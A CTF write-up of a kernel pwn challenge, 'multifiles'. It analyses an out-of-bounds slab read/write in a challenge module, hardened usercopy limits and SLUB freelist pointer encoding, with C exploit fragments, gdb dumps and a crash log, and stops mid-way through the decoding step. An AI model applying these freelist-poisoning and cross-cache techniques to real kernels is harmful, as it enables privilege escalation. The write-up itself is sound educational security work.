b01lers ctf 2026: kernel pwn (part 2)
Intro
Previously I wrote a writeup on the first kernel challenge from this CTF — if you haven’t read it yet, I recommend starting with Part 1.
This post covers multifiles, the second kernel pwn challenge.
In Part 1 I reimplemented the exploit from scratch in Rust to cover every step required for exploitation. This writeup is already late, so this time you get a refactored version of the original C exploit instead.
multifiles
Recon
.
├── build_out
│   ├── bzImage
│   ├── initrd.cpio.gz
│   ├── kernel.config
│   ├── multifiles.ko
│   └── System.map
├── deploy
│   ├── docker-compose.prod.yml
│   ├── docker-compose.yml
│   ├── Dockerfile
│   ├── Dockerfile_build
│   └── wrapper.sh
├── dev.sh
├── pwn_build.sh
├── README.md
└── src
    ├── drop_priv.c
    ├── initrd_init
    ├── kernel-cache-usercopy.diff
    ├── kernel.config.fragment
    ├── Makefile
    └── multifiles.c

4 directories, 19 files
README.md
# multifiles

build artifacts in `build_out/`

rebuild with `pwn_build.sh`

run challenge with `dev.sh`
Based on deploy/wrapper.sh, I assembled a local run script:
#!/bin/sh
qemu-system-x86_64 \
  -nodefaults -m 256M -nographic \
  -kernel ~/multifiles/build_out/bzImage \
  -initrd ~/multifiles/build_out/initrd.cpio.gz \
  -append "console=ttyS0 loglevel=3 oops=panic panic=-1 pti=on kaslr" \
  -cpu qemu64,+smep,+smap \
  -smp 1 -no-reboot -serial stdio -monitor none
The VM boots successfully.
[multifiles] booting challenge initrd
==============================
 multifiles kernel challenge
==============================
Device: /dev/multifiles
Flag: /root/flag.txt (root only)
User: ctf (uid=1000)
==============================


BusyBox v1.35.0 (Debian 1:1.35.0-4+b7) built-in shell (ash)
Enter 'help' for a list of built-in commands.

sh: can't access tty; job control turned off
~ $
Read sources
src
├── drop_priv.c
├── initrd_init
├── kernel-cache-usercopy.diff
├── kernel.config.fragment
├── Makefile
└── multifiles.c
drop_priv and initrd_init follow the same pattern as Part 1.
Here we have a target kernel module and a small patch to the kernel itself.
Let’s go through the interesting source files.
kernel-cache-usercopy.diff adds kmem_cache_copy_from_user / kmem_cache_copy_to_user — wrappers around copy_from/to_user that first verify the destination/source object belongs to a specific slab cache before performing the copy:
+/**
+ * kmem_cache_copy_from_user - Copy from userspace into an object from a cache
+ * @cachep: The cache the destination object must belong to.
+ * @to: Destination address in kernel memory.
+ * @from: Source address in userspace.
+ * @n: Number of bytes to copy.
+ *
+ * This wraps copy_from_user(), but first verifies that @to lives in a slab
+ * belonging to @cachep. The subsequent copy_from_user() call performs the
+ * normal hardened usercopy heap validation for the destination range.
+ *
+ * Return: number of bytes not copied, like copy_from_user().
+ */
From kernel.config.fragment, note the slab configuration:
CONFIG_SLAB_FREELIST_HARDENED=y
CONFIG_SLAB_FREELIST_RANDOM=n
FREELIST_HARDENED encodes freelist pointers (next ^ secret ^ bswap64(slot_addr)), making them not trivially readable. FREELIST_RANDOM=n means the freelist order within a slab page is deterministic — useful for reliable object placement. If this is unfamiliar, this article is a good reference.
multifiles.c: the init and exit functions are standard boilerplate. The interesting part is the file_operations table:
static const struct file_operations multifiles_fops = {
    .owner = THIS_MODULE,
    .open = multifiles_open,
    .release = multifiles_release,
    .read = multifiles_read,
    .write = multifiles_write,
    .llseek = multifiles_llseek,
    .unlocked_ioctl = multifiles_ioctl,
    #ifdef CONFIG_COMPAT
    .compat_ioctl = multifiles_ioctl,
    #endif
};
Now the data structures the module operates on:
#define TYPE_FILE 1

// this should be the only flags needed. should not be leaked to userspace
#define DEFAULT_FLAGS 0x7d333a7b66746362

#define NAME_SIZE 16
#define DATA_COUNT 16
#define MAX_RW_SIZE 64

typedef struct {
    u64 type;
    u64 flags;
    char name[NAME_SIZE];
    u64 data[DATA_COUNT];
} MultiFile;

#define NUM_SLOTS 67

typedef struct {
    struct mutex lock;
    MultiFile *files[NUM_SLOTS];
    u32 active_idx;
} MultiFileList;

typedef struct {
    char name[16];
} MultiFileCreateReq;
A few things to note from this:
- MultiFile is 0xa0 bytes (0x10 header of type + flags, 0x10 name, 0x80 data). These are the objects allocated from multifiles_cache, one per ioctl(CREATE).
- Each open() allocates one MultiFileList (stored in file->private_data), which holds up to NUM_SLOTS = 67 MultiFile pointers in files[]. So a single fd can keep up to 67 live objects, and the index returned by CREATE is just the slot in this per-fd array. active_idx selects which slot read/write operate on.
- DEFAULT_FLAGS = 0x7d333a7b66746362 is set on every freshly created MultiFile, and the source explicitly comments that it should not be leaked to userspace. In ASCII that is bctf{:3}, a deliberate canary. Note where it lives: offset 0x08, inside the type + flags header. As we'll see, the cache's usercopy region starts at name (0x10), so this header sits outside what copy_to/from_user is allowed to touch, which is exactly what stops us from leaking it directly.
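The offsets quoted above are easy to double-check from userspace. The following is a minimal sketch, assuming a userspace mirror of the struct with u64 mapped to uint64_t; MultiFileMirror and u64_to_ascii are names invented here for illustration and are not part of the module.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define NAME_SIZE  16
#define DATA_COUNT 16

/* Hypothetical userspace mirror of the module's MultiFile. */
typedef struct {
    uint64_t type;
    uint64_t flags;
    char     name[NAME_SIZE];
    uint64_t data[DATA_COUNT];
} MultiFileMirror;

/* Compile-time checks of the offsets quoted in the text. */
_Static_assert(offsetof(MultiFileMirror, flags) == 0x08, "flags at 0x08");
_Static_assert(offsetof(MultiFileMirror, name)  == 0x10, "name at 0x10");
_Static_assert(offsetof(MultiFileMirror, data)  == 0x20, "data at 0x20");
_Static_assert(sizeof(MultiFileMirror)          == 0xa0, "object is 0xa0 bytes");

/* Render a 64-bit value as its 8 little-endian bytes plus a NUL. */
static void u64_to_ascii(uint64_t v, char out[9]) {
    assert(out != NULL);
    for (int i = 0; i < 8; i++)
        out[i] = (char)((v >> (8 * i)) & 0xff);
    out[8] = '\0';
}
```

Passing DEFAULT_FLAGS to u64_to_ascii yields the canary string, which is how the value reads in a little-endian memory dump.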
Vulnerabilities
Looking at multifiles_read:
static ssize_t multifiles_read(struct file *self, char __user *buf, size_t count, loff_t *offset) {
    MultiFileList *list = self->private_data;
    ssize_t ret = 0;
    if (list == NULL) {
        return -EINVAL;
    }

    mutex_lock(&list->lock);

    // check index is selected
    MultiFile *multi_file = get_active_file(list);
    if (multi_file == NULL) {
        ret = -ENOENT;
        goto out_unlock;
    }

    // check read bounds
    if (
        count > MAX_RW_SIZE
        || (count % sizeof(u64)) != 0
        || *offset >= sizeof(MultiFile)
        || *offset < 0
    ) {
        ret = -EINVAL;
        goto out_unlock;
    }

    loff_t old_offset = *offset;
    *offset += count;

    if (kmem_cache_copy_to_user(
        multifiles_cache,
        buf,
        ((u8 *) &multi_file->data[0]) + old_offset,
        count
    ) != 0) {
        ret = -EFAULT;
        goto out_unlock;
    }

    ret = count;

out_unlock:
    mutex_unlock(&list->lock);
    return ret;
}
multifiles_write is similar.
The bounds check validates offset against sizeof(MultiFile) = 0xa0, but the actual copy base is &multi_file->data[0] + offset = obj+0x20+offset. So at offset=0x80 the copy starts at obj+0xa0 — exactly the first byte of the next adjacent slab object.
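To make the mismatch concrete, here is a small sketch of the arithmetic only. copy_start and oob_bytes are hypothetical helper names; the constants come from the struct layout above.

```c
#include <assert.h>
#include <stddef.h>

#define OBJ_SIZE 0xa0  /* sizeof(MultiFile) */
#define DATA_OFF 0x20  /* offsetof(MultiFile, data) */

/* Offset, relative to the object start, where the driver's copy begins. */
static size_t copy_start(size_t f_pos) {
    assert(f_pos < OBJ_SIZE);  /* the only bound the driver enforces */
    return DATA_OFF + f_pos;
}

/* Number of copied bytes that fall past the end of the object. */
static size_t oob_bytes(size_t f_pos, size_t count) {
    size_t start = copy_start(f_pos);
    if (start >= OBJ_SIZE)
        return count;                       /* the whole copy is out of bounds */
    size_t end = start + count;
    return end > OBJ_SIZE ? end - OBJ_SIZE : 0;
}
```

With f_pos = 0 and a 0x40-byte copy nothing leaves the object, while any f_pos of 0x80 or more puts the entire copy in the neighbor. This only counts bytes; whether the kernel lets such a copy through is a separate question handled by hardened usercopy.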
Now multifiles_llseek:
loff_t multifiles_llseek(struct file *self, loff_t offset, int whence) {
    MultiFileList *list = self->private_data;
    if (
        list == NULL
        // too lazy to support other types
        || whence != SEEK_SET
        || offset >= sizeof(MultiFile)
        || offset < 0
    ) {
        return -EINVAL;
    }

    mutex_lock(&list->lock);
    self->f_pos = offset;
    mutex_unlock(&list->lock);

    return offset;
}
llseek lets us set f_pos (the file position) to any value in [0, 0xa0). Combined with the mismatched copy base, this gives a controlled OOB window into the next adjacent slab object.
It’s worth being precise about why f_pos is the same thing as the loff_t *offset that multifiles_read/multifiles_write receive. When userspace calls read(fd, buf, n), the VFS path ksys_read() (in fs/read_write.c) does roughly:
loff_t pos = file_pos_read(file); // copy of file->f_pos
vfs_read(file, buf, n, &pos); // -> file->f_op->read(file, buf, n, &pos)
file_pos_write(file, pos); // write the (advanced) position back
So the loff_t *offset argument handed to the driver is a pointer to a copy of file->f_pos, and after the op the kernel writes it back (which is why a normal read advances the position). multifiles_llseek sets file->f_pos directly. Net effect: lseek() followed by read()/write() lets us pick exactly where the driver’s copy starts — including the OOB window [0x80, 0x9f].
Further reading (VFS f_pos/llseek):
- Linux kernel docs: VFS, struct file_operations (the llseek/read/write contracts)
- lseek(2) man page (userspace semantics, SEEK_SET)
- fs/read_write.c on Bootlin Elixir: read ksys_read, file_pos_read/file_pos_write, vfs_read, generic_file_llseek to see how f_pos flows into *offset
Primitives
Controlled OOB read/write:
By setting f_pos via llseek to a value in [0x80, 0x9f], read()/write() will copy from/to obj+0x20+offset, which lands in the next adjacent slab object. Up to 64 bytes (MAX_RW_SIZE) per operation, 8-byte aligned (count % sizeof(u64) == 0).
Arbitrary position within object:
llseek allows resetting f_pos to any value in [0, 0x9f], giving full control over where within the object (or OOB window) the next read/write lands.
Multiple independent file descriptors:
Each open() on /dev/multifiles gets its own MultiFileList with its own 67 slots and its own f_pos. Objects in one fd’s list can be adjacent in the slab to objects from another fd’s list, enabling cross-fd OOB access.
Exploitation
Before diving in, here’s the whole plan:
- Validate the OOB. Confirm a slot can read its neighbor through the base-vs-bounds mismatch.
- Leak the heap. Decode page_base and cache_random from encoded freelist words on a full slab page.
- Forge a freelist pointer. With the secret known, poison a freed object's next to a chosen address.
- Find contiguous pages. Locate two physically adjacent slab pages A, B == A+0x1000.
- Build a page-end fake object. Poison A's tail so a fresh object lands at A+0xfc0 and straddles into B.
- Cross-cache reclaim. Drain B back to the buddy allocator and let a struct file for /bin/drop_priv take its place.
- Patch and respawn. Flip the file's f_mode write bits through the straddle, pwrite the binary, and let init rerun it as root.
Primitive validation
The exploit is built on a thin layer of wrappers over the driver ABI:
int mf_open(void); // open("/dev/multifiles", O_RDWR)
int mf_create(int fd, const char *name); // ioctl(CREATE) -> slot index
void mf_set_active(int fd, uint32_t idx); // ioctl(SET_ACTIVE)
void mf_delete(int fd, uint32_t idx); // ioctl(DELETE)
// select idx, lseek(fpos, SEEK_SET), then read len bytes (len % 8 == 0, <= 64)
void mf_read(int fd, uint32_t idx, off_t fpos, void *buf, size_t len);
// same sequence with write() instead of read(); used by the poisoning steps later
void mf_write(int fd, uint32_t idx, off_t fpos, const void *buf, size_t len);
Note that mf_read folds set_active + lseek + read into one call, so fpos is exactly the f_pos the driver will use as its copy offset.
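For reference, the lseek + read half of such a wrapper can be sketched as below. This is not the exploit's actual mf_read: seek_then_read is a hypothetical name, and the SET_ACTIVE ioctl that mf_read issues first is left out because its request number is not shown in this post.

```c
#include <assert.h>
#include <fcntl.h>      /* open(), for callers */
#include <stdint.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Position the fd with lseek(SEEK_SET), then read exactly len bytes.
 * Returns 0 on success, -1 on any failure or short read.
 */
static int seek_then_read(int fd, off_t fpos, void *buf, size_t len) {
    /* mirror the driver's limits: multiple of 8, at most MAX_RW_SIZE */
    assert(len % sizeof(uint64_t) == 0 && len <= 64);
    if (lseek(fd, fpos, SEEK_SET) != fpos)
        return -1;
    return read(fd, buf, len) == (ssize_t)len ? 0 : -1;
}
```

Because the driver advances the position by count on every read, the seek has to be repeated before each access; folding it into the wrapper keeps every call site explicit about where the copy starts.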
For now let’s work within a single file descriptor and validate the OOB primitive.
int main(void) {
    int fd = mf_open();
    int a0 = mf_create(fd, "a0");
    int a1 = mf_create(fd, "a1");
    int a2 = mf_create(fd, "a2");
    printf("[*] created slots: a0=%d a1=%d a2=%d\n", a0, a1, a2);

    printf("[*] press enter to set_active(%d)...\n", a0);
    getchar();

    mf_set_active(fd, a0);
    printf("[*] active = %d\n", a0);

    return 0;
}
multifiles_set_active is static and gets inlined into multifiles_ioctl, so there is no standalone symbol to break on. Set a breakpoint at multifiles_ioctl (.text+0x2f0) and step into the SET_ACTIVE branch from the switch.
gef> x/16gx $r12+0x20
0xffff8880038d7020: 0xffff888003989000 0xffff8880039890a0
0xffff8880038d7030: 0xffff888003989140 0x0000000000000000
0xffff8880038d7040: 0x0000000000000000 0x0000000000000000
0xffff8880038d7050: 0x0000000000000000 0x0000000000000000
0xffff8880038d7060: 0x0000000000000000 0x0000000000000000
0xffff8880038d7070: 0x0000000000000000 0x0000000000000000
0xffff8880038d7080: 0x0000000000000000 0x0000000000000000
0xffff8880038d7090: 0x0000000000000000 0x0000000000000000
gef> telescope *(void**)($r12+0x20) -n
0xffff888003989000|+0x0000|+000: 0x0000000000000001
0xffff888003989008|+0x0008|+001: 0x7d333a7b66746362 'bctf{:3}a0'
0xffff888003989010|+0x0010|+002: 0x0000000000003061 ('a0'?)
0xffff888003989018|+0x0018|+003: 0x0000000000000000
0xffff888003989020|+0x0020|+004: 0x0000000000000000
0xffff888003989028|+0x0028|+005: 0x0000000000000000
0xffff888003989030|+0x0030|+006: 0x0000000000000000
0xffff888003989038|+0x0038|+007: 0x0000000000000000
0xffff888003989040|+0x0040|+008: 0x0000000000000000
0xffff888003989048|+0x0048|+009: 0x0000000000000000
0xffff888003989050|+0x0050|+010: 0x0000000000000000
0xffff888003989058|+0x0058|+011: 0x0000000000000000
0xffff888003989060|+0x0060|+012: 0x0000000000000000
0xffff888003989068|+0x0068|+013: 0x0000000000000000
0xffff888003989070|+0x0070|+014: 0x0000000000000000
0xffff888003989078|+0x0078|+015: 0x0000000000000000
0xffff888003989080|+0x0080|+016: 0x0000000000000000
0xffff888003989088|+0x0088|+017: 0x0000000000000000
0xffff888003989090|+0x0090|+018: 0x0000000000000000
0xffff888003989098|+0x0098|+019: 0x0000000000000000
0xffff8880039890a0|+0x00a0|+020: 0x0000000000000001
0xffff8880039890a8|+0x00a8|+021: 0x7d333a7b66746362 'bctf{:3}a1'
0xffff8880039890b0|+0x00b0|+022: 0x0000000000003161 ('a1'?)
0xffff8880039890b8|+0x00b8|+023: 0x0000000000000000
...
0xffff888003989140|+0x0140|+040: 0x0000000000000001
0xffff888003989148|+0x0148|+041: 0x7d333a7b66746362 'bctf{:3}a2'
0xffff888003989150|+0x0150|+042: 0x0000000000003261 ('a2'?)
...
Leaking the flag — and the hardened usercopy wall
The obvious first target is that bctf{:3} canary in flags. A freshly created neighbor has flags at offset 0x08, so let's point the OOB read at the neighbor's header: f_pos=0x80 makes the copy start at obj+0xa0, which is the neighbor's offset 0, and that would put its flags at leak+0x08 (the second 8-byte word of the buffer).
uint8_t leak[0x40];
mf_read(fd, a0, 0x80, leak, sizeof(leak)); // copy base obj+0xa0 = neighbor+0x00
// neighbor flags would land at leak+0x08
printf("[*] neighbor flags = 0x%llx\n", *(unsigned long long *)(leak + 8));
Running it instantly panics:
[ 12.567074] usercopy: Kernel memory exposure attempt detected from SLUB object 'multifiles_cache' (offset 0, size 64)!
[ 12.568138] ------------[ cut here ]------------
[ 12.568300] kernel BUG at mm/usercopy.c:102!
[ 12.569592] Oops: invalid opcode: 0000 [#1] PREEMPT SMP PTI
[ 12.570619] CPU: 0 UID: 1000 PID: 54 Comm: w Tainted: G O 6.12.81-dirty #1
[ 12.571082] Tainted: [O]=OOT_MODULE
[ 12.571198] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-10.fc44 06/10/2025
[ 12.571507] RIP: 0010:usercopy_abort+0x68/0x80
[ 12.572341] Code: ac 51 48 c7 c2 48 b3 97 ac 41 52 48 c7 c7 58 2d 9c ac 48 0f 45 d6 48 c7 c6 45 09 96 ac 48 89 c1 49 0f 45 f3 e8 f9 27 e9 ff 90 <0f> 0b 49 c7 c1 f8 f4 99 ac 4d 89 ca 4d 89 c8 eb a7 0f 1f 80 00 00
[ 12.572840] RSP: 0018:ffffb6d740173dd0 EFLAGS: 00010246
[ 12.573072] RAX: 000000000000006a RBX: ffffa01ac19ba0a0 RCX: 00000000ffffdfff
[ 12.573194] RDX: 0000000000000000 RSI: ffffb6d740173c88 RDI: 0000000000000001
[ 12.573337] RBP: 0000000000000040 R08: 0000000000009ffb R09: 00000000ffffdfff
[ 12.573559] R10: 00000000ffffdfff R11: ffffffffacc555e0 R12: 0000000000000001
[ 12.573675] R13: ffffa01ac19ba0e0 R14: fffffffffffffff2 R15: ffffb6d740173f08
[ 12.573815] FS: 0000000000409cb8(0000) GS:ffffa01acf800000(0000) knlGS:0000000000000000
[ 12.573935] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 12.574026] CR2: 000000000040601a CR3: 00000000019a4000 CR4: 00000000003006f0
[ 12.574242] Call Trace:
[ 12.575178] <TASK>
[ 12.575606] __check_heap_object+0x7d/0xa0
[ 12.575858] __check_object_size+0x166/0x2b0
[ 12.575983] kmem_cache_copy_to_user+0x85/0xe0
[ 12.576196] multifiles_read+0xa6/0xc0 [multifiles]
[ 12.576675] vfs_read+0xda/0x350
[ 12.576795] ksys_read+0x6a/0xf0
[ 12.576868] do_syscall_64+0x9e/0x1a0
[ 12.577066] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 12.577338] RIP: 0033:0x4042b0
[ 12.578697] </TASK>
[ 12.578775] Modules linked in: multifiles(O)
[ 12.579623] ---[ end trace 0000000000000000 ]---
[ 12.581620] Kernel panic - not syncing: Fatal exception
[ 12.582376] Kernel Offset: 0x2aa00000 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffffbfffffff)
This is hardened usercopy. Recall the cache is created with kmem_cache_create_usercopy(..., offsetof(MultiFile, name), USERCOPY_SIZE, ...) — useroffset 0x10, usersize 0x90. Only [obj+0x10, obj+0xa0) (name + data) is allowed to cross the user boundary. __check_object_size figures out which slab object our source pointer lands in (the neighbor) and checks the range against its usercopy region. Our copy started at neighbor+0x00, below 0x10, so it aborts — “offset 0, size 64”.
The takeaway is a hard constraint on the primitive: the OOB copy must start at neighbor+0x10 or later, i.e. f_pos >= 0x90. The header — type, flags, and (once the object is freed) the freelist pointer at offset 0 — is all unreachable this way. So the bctf{:3} canary cannot be leaked directly; it lives in the header precisely so hardened usercopy guards it.
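The constraint can be captured in a few lines. The sketch below is a simplified model of the range test, not the kernel's code: it assumes objects are packed back to back from the start of the page with no red zones, and usercopy_ok / oob_copy_ok are hypothetical names.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

#define OBJ_SIZE   0xa0  /* sizeof(MultiFile) */
#define DATA_OFF   0x20  /* offsetof(MultiFile, data) */
#define USEROFFSET 0x10  /* offsetof(MultiFile, name) */
#define USERSIZE   0x90  /* name + data */

/*
 * The copy must lie entirely inside [USEROFFSET, USEROFFSET + USERSIZE)
 * of the object containing its first byte. page_off is the offset of
 * that first byte within the slab page.
 */
static bool usercopy_ok(size_t page_off, size_t n) {
    size_t off = page_off % OBJ_SIZE;  /* offset inside the containing object */
    return off >= USEROFFSET &&
           off - USEROFFSET <= USERSIZE &&
           n <= USERSIZE - (off - USEROFFSET);
}

/* Would read()/write() at f_pos on the object at obj_page_off survive? */
static bool oob_copy_ok(size_t obj_page_off, size_t f_pos, size_t n) {
    assert(f_pos < OBJ_SIZE);          /* enforced by the driver */
    return usercopy_ok(obj_page_off + DATA_OFF + f_pos, n);
}
```

Under this model a 0x40-byte copy at f_pos=0x80 is rejected (it starts at the neighbor's offset 0), while f_pos=0x90 and f_pos=0x98 pass. It also suggests that a copy starting inside our own object cannot run across the boundary into the neighbor, so the useful OOB window really is the one that starts in the neighbor's usercopy region.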
Pointing the read at the neighbor’s name instead works cleanly (f_pos=0x90 → start obj+0xb0 = neighbor+0x10):
// usercopy region is [name(0x10), 0xa0); copy must start at >= neighbor+0x10
uint8_t leak[0x40];
mf_read(fd, a0, 0x90, leak, sizeof(leak)); // copy base obj+0xb0 = neighbor->name
printf("[*] neighbor name = 0x%llx ('%.16s')\n",
       *(unsigned long long *)leak, (char *)leak);

[*] neighbor name = 0x3161 ('a1')
0x3161 is "a1" — the name we gave the second object — confirming slot 0 and slot 1 are adjacent and the OOB read works. The primitive is validated, with the constraint baked in: we can only see [neighbor+0x10, neighbor+0xa0) (name + data).
Free the chunk
Let’s free the neighbor (mf_delete) and look at what SLUB leaves behind.
Dumping the freed object (shown here in gdb at its real address; everything in [0x10, 0xa0) is also reachable through our OOB read):
0xffff8880039980a0 +0x00: 0x0000000000000001 type (NOT cleared on free)
0xffff8880039980a8 +0x08: 0x7d333a7b66746362 bctf{:3} flags (NOT cleared)
0xffff8880039980b0 +0x10: 0x0000000000003161 "a1" name (NOT cleared)
0xffff8880039980b8 +0x18: 0x0000000000000000
0xffff8880039980c0 +0x20: 0x0000000000000000 data[0]
...
0xffff8880039980f0 +0x50: 0x76bb00d4c7d73040 <-- freelist pointer
0xffff8880039980f8 +0x58: 0x0000000000000000
...
0xffff888003998140 +0xa0: 0x0000000000000001 (next object's type)
Two things stand out.
First, SLUB does not zero an object on free — it only writes the freelist pointer. That’s why type, flags (bctf{:3}) and name (“a1”) survive untouched in the freed chunk.
Second, the freelist pointer sits at offset 0x50, not 0. That’s sizeof(MultiFile) / 2, the result of the “relocate freelist pointer to the middle of the object” hardening. Crucially 0x50 falls inside [0x10, 0xa0) — the usercopy region — so unlike the 0x00 header, we can both read and write the freelist pointer through the OOB primitive.
Why does the value (0x76bb00d4c7d73040) look like garbage? CONFIG_SLAB_FREELIST_HARDENED mangles it:
fp = next ^ s->random ^ bswap64(&slot)
where &slot is the address of the pointer itself (obj+0x50), next is the next free object in the list, and s->random is a per-cache secret. A single read is one equation with three unknowns — we can’t naively decode it, nor forge an arbitrary pointer to write back.
Reading it through the OOB primitive
The dump above is gdb at the object’s real address; in the exploit we only have read(). To pull neighbor+0x50 into a 64-byte copy window the copy has to start at or before it: f_pos=0x98 sets the base to obj+0xb8 = neighbor+0x18, and a 0x40-byte read spans neighbor[0x18, 0x58), so the encoded word at neighbor+0x50 lands at leak+0x38.
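The window arithmetic generalizes to any field of the neighbor. A minimal sketch, with window_index as a hypothetical helper name and the constants taken from the text:

```c
#include <assert.h>
#include <stddef.h>

#define OBJ_SIZE 0xa0  /* sizeof(MultiFile) */
#define DATA_OFF 0x20  /* offsetof(MultiFile, data) */
#define WINDOW   0x40  /* MAX_RW_SIZE */

/*
 * For an OOB read at f_pos, return the index inside the 0x40-byte buffer
 * where the neighbor's 8-byte field at neighbor_off lands, or -1 if the
 * window does not cover all 8 bytes of it.
 */
static long window_index(size_t f_pos, size_t neighbor_off) {
    assert(f_pos < OBJ_SIZE);
    size_t start = DATA_OFF + f_pos;   /* relative to our own object */
    if (start < OBJ_SIZE)
        return -1;                     /* copy starts inside our own object */
    size_t first = start - OBJ_SIZE;   /* first neighbor offset copied */
    if (neighbor_off < first || neighbor_off + 8 > first + WINDOW)
        return -1;
    return (long)(neighbor_off - first);
}
```

window_index(0x98, 0x50) gives 0x38, matching the leak+0x38 used here, while f_pos=0x90 stops exactly at neighbor+0x50 and misses the freelist word.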
We also need the neighbor to actually be free — otherwise +0x50 is just zeroed data — and we want its next to be a value we can reason about. So allocate three adjacent objects and free the last two. SLUB’s per-cpu freelist is LIFO, so freeing b2 then b1 leaves b1->next == b2:
int b0 = mf_create(fd, "b0");
int b1 = mf_create(fd, "b1");
int b2 = mf_create(fd, "b2");

mf_delete(fd, b2); // free b2 first
mf_delete(fd, b1); // then b1 -> b1->next == b2, freeptr written at b1+0x50

uint8_t leak[0x40];
mf_read(fd, b0, 0x98, leak, sizeof(leak)); // window b1[0x18, 0x58)

uint64_t enc;
memcpy(&enc, leak + 0x38, sizeof(enc)); // b1+0x50
printf("[+] encoded freelist ptr @ b1+0x50 = 0x%016llx\n",
       (unsigned long long)enc);

[+] encoded freelist ptr @ b1+0x50 = 0x4b89a339485018db
That 0x4b89a339485018db is b2 ^ s->random ^ bswap64(b1+0x50) — kernel-controlled metadata, not the name bytes we picked. Reading (and writing) +0x50 is now a real code primitive, not just a gdb observation.
What the membership check rules out
Before building on the freelist pointer, look at the custom gate every copy goes through (kernel-cache-usercopy.diff):
static bool kmem_cache_has_object(struct kmem_cache *cachep, const void *ptr) {
    struct slab *slab = virt_to_slab(ptr);
    return slab && slab->slab_cache == cachep;
}
This is a per-slab-folio check: it resolves the page ptr lives in and requires slab->slab_cache == multifiles_cache. The consequence for a cross-cache plan: if we drain a multifiles slab page back to the buddy allocator and let another cache (say filp_cachep) reclaim it, that page’s slab_cache is no longer multifiles_cache, so any OOB read/write through multifiles_read/write fails the check. We cannot OOB-read a reclaimed struct file directly — the naive “cross-cache then read the foreign object” approach is dead on arrival.
So the workable primitive is the freelist pointer we can read and write at +0x50. The remaining problem is weaponizing it under the hardening: either leak s->random + a heap address, or use a poisoning trick that cancels both (page-relative deltas XOR out the page base and the secret). That’s the next step.
Decoding the freelist pointer
Primary source
The encoding lives in freelist_ptr_encode() in mm/slub.c (v6.12):
static inline freeptr_t freelist_ptr_encode(const struct kmem_cache *s,
                                            void *ptr, unsigned long ptr_addr)
{
    unsigned long encoded;
#ifdef CONFIG_SLAB_FREELIST_HARDENED
    encoded = (unsigned long)ptr ^ s->random ^ swab(ptr_addr);
#else
    encoded = (unsigned long)ptr;
#endif
    return (freeptr_t){.v = encoded};
}
and set_freepointer() fixes ptr_addr to the storage slot itself:
unsigned long freeptr_addr = (unsigned long)object + s->offset;
*(freeptr_t *)freeptr_addr = freelist_ptr_encode(s, fp, freeptr_addr);
s->offset is 0x50 for our cache, swab on a 64-bit value is bswap64, so for an object at base O:
E(O) = next(O) ^ s->random ^ bswap64(O + 0x50)
One word is one equation in three unknowns — next, s->random, and O (which hides the unknown page base). We kill two of them with two XOR cancellations.
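In userspace the same formula is a pair of one-liners. This is a sketch under the assumptions stated above (freelist pointer at offset 0x50, 64-bit byte swap); bsw, freeptr_encode and freeptr_decode are illustrative names, not kernel functions.

```c
#include <assert.h>
#include <stdint.h>

#define FREEPTR_OFF 0x50  /* s->offset for this cache, per the text */

/* Portable 64-bit byte swap (what swab() does on a 64-bit value). */
static uint64_t bsw(uint64_t v) {
    uint64_t r = 0;
    for (int i = 0; i < 8; i++) {
        r = (r << 8) | (v & 0xff);
        v >>= 8;
    }
    return r;
}

/* Encoded word stored at obj + 0x50 when obj is freed with the given next. */
static uint64_t freeptr_encode(uint64_t next, uint64_t random, uint64_t obj) {
    assert((obj & 7) == 0);  /* slab objects here are 8-byte aligned */
    return next ^ random ^ bsw(obj + FREEPTR_OFF);
}

/* XOR is its own inverse, so decoding applies the same mask. */
static uint64_t freeptr_decode(uint64_t enc, uint64_t random, uint64_t obj) {
    return enc ^ random ^ bsw(obj + FREEPTR_OFF);
}
```

Decoding needs both random and the object address, which is exactly why a single leaked word is not enough on its own.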
Two cancellations
- XOR two words to cancel random. It's one per-cache constant, so E(A) ^ E(B) drops it.
- Same-page bswap cancels the page base. bswap64(a) ^ bswap64(b) = bswap64(a ^ b), and for two freeptr slots on the same 4K page a ^ b is just the low-bits delta: the page base is identical in both and cancels. We don't know the address, but we know the "distance".
Layout
0x1000 / 0xa0 = 25 objects per page (0x60 tail padding). On a pristine page allocations climb by address, so O_i = page + i*0xa0. We use three of them:
O_20 = page+0xc80 slot page+0xcd0
O_22 = page+0xdc0 slot page+0xe10
O_24 = page+0xf00 slot page+0xf50 (last object on the page)
To read E(O_i) we OOB-read from its live left neighbor O_{i-1} (f_pos=0x98, word at leak+0x38), so we keep odd indices alive and free even ones. Fill the page completely, then free 24, 22, 20 in that order — the per-cpu freelist is LIFO and a full page starts with an empty freelist, so:
free 24: next(O_24) = NULL
free 22: next(O_22) = O_24
free 20: next(O_20) = O_22
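The layout numbers and the free order can be checked with a toy model. This is only an illustration of LIFO push behaviour on a page that starts full; ToyFreelist and its helpers are invented for this sketch and do not model SLUB's real per-cpu structures.

```c
#include <assert.h>
#include <stddef.h>

#define SLAB_PAGE     0x1000
#define OBJ_SIZE      0xa0
#define OBJS_PER_PAGE (SLAB_PAGE / OBJ_SIZE)  /* 25 */
#define NONE          (-1)                    /* stands in for a NULL next */

/* Page offset of object i on a pristine page. */
static size_t obj_off(int i) {
    assert(i >= 0 && i < OBJS_PER_PAGE);
    return (size_t)i * OBJ_SIZE;
}

/* next_of[i] records what object i pointed to at the moment it was freed. */
typedef struct {
    int head;
    int next_of[OBJS_PER_PAGE];
} ToyFreelist;

static void toy_init(ToyFreelist *fl) {
    fl->head = NONE;                  /* a full page has an empty freelist */
    for (int i = 0; i < OBJS_PER_PAGE; i++)
        fl->next_of[i] = NONE;
}

static void toy_free(ToyFreelist *fl, int i) {
    fl->next_of[i] = fl->head;        /* freed object points at the old head */
    fl->head = i;                     /* and becomes the new head */
}
```

Freeing 24, 22, 20 in that order leaves next_of[24] empty, next_of[22] == 24 and next_of[20] == 22, which is the chain the decode step relies on.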
Recovering page base and random
slot24 ^ slot22 = 0xf50 ^ 0xe10 = 0x140, and bswap64(0x140) = 0x4001000000000000. With e24/e22/e20 read from O_23/O_21/O_19:
// e24 = NULL ^ R ^ bsw(page+0xf50)
// e22 = O_24 ^ R ^ bsw(page+0xe10) (O_24 = page+0xf00)
